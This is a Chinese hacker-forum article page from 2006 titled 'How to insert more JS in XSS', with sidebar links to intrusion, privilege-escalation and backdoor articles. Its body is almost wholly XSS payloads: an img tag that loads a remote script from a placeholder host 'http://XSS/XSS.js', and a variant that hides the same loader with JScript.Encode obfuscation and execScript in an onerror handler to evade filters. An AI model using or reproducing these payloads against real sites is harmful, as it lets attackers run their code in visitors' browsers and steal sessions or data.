黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客入门 >> 电脑新手 >> 正文
·没有路由密码权限时的鸽08-23·上网安全 Vista自我防范10-11
·让濒临崩溃的Windows XP10-11·有备无患,快速自制救急10-11
·要你好看!Windows看图工10-11·空间赞助网提供不同类型10-11
·讨论net.exe和net1.exe的10-10·让3389远程桌面传输更通10-10
·巧妙入侵渗透赌博站10-10·Aspx空间扫权限工具10-10
·Windows2003最新提权工具10-10·易淘乐提供100M免费全能10-10
·系统开机密码忘了不着急10-09·中意网络提供免费100M免10-09
·与众不同 Windows XP开始10-08·让桌面图标翻跟斗 在XP上10-08
·上海宽元站长资助计划-提10-08·个性化Windows XP的任务10-07
·趣盘提供3G免费网络硬盘10-07·秀山热线提供200MB免费全10-07
·一次艰辛的提权过程10-06·成功入侵IT大卖场的渗透10-06
·mysqlhack- MYSQL利用工10-06·lanker一句话PHP后门客户10-06
·WIXI提供3G免费多媒体网10-06·新人网络提供100M/ftp免10-06
·如何利用QQ带来高流量10-05·UuShare提供免费网络文件10-05
[推荐]在XSS中如何再插JS
        ★★★★★

在XSS中如何再插JS

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2006-11-30 9:30:29
程序代码

<img src="javascript:try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}"></img>

字符过滤怎么办?用Encode加密后就无敌了~

未加密前:
程序代码

<img src='#' XSS="try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}" onerror="execScript(decodeURI(this.XSS),'Jscript.Encode');" >


加密后:
程序代码

<img src='#' XSS="#@~^bQAAAA==OMX`7lMP/{NK^Es+UYcm.nmY+As+s+xDcv/1DbwOBbIkRdD1xB4YO2=zzpjUzp?U N/vpNKmEs+ or(W[Xcl22 xN;4k^N`kbI81lDm4`nbP8XCcAAA==^#~@ " onerror="execScript(decodeURI(this.XSS),'Jscript.Encode');" >
文章录入:cainiaowang    责任编辑:cainiaowang 
  • 上一篇文章:

  • 下一篇文章:
    • 【字体:
    中介交易区
    最 新 热 门
    没有路由密码权限时的鸽子上线方08-23
    完全解析网页后门和挂马04-02
    真实的网络攻击取证纪实03-27
    利用404错误页面挂马03-21
    解密风暴03-21
    社会工程学在黑客中的应用01-02
    轻轻松松解密各种网页木马12-21
    SA权限无xp_cmdshell时取权限又一12-14
    sqlserver2005中恢复xp_cmdshell11-10
    实现无net.exe和net1.exe添加系统10-26
    用U盘轻松去除XP管理员密码10-26
    教你多种保护措施限用移动硬盘10-09
    相 关 文 章
    多款RSS阅读器出现XSS漏洞
    XSS中再插JS
    百度跨站漏洞谢幕篇
    百度多处XSS跨站漏洞续篇
    百度竞价排名多处XSS漏洞
    百度空间多处XSS漏洞续篇
    百度空间多处DOM XSS漏洞
    百度的JS数据流注入型跨站
    百度贴吧标题XSS漏洞
    Google 的 XSS 检测工具:Ratproxy
    关于XSS漏洞另一个攻击趋势
    js下载者
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886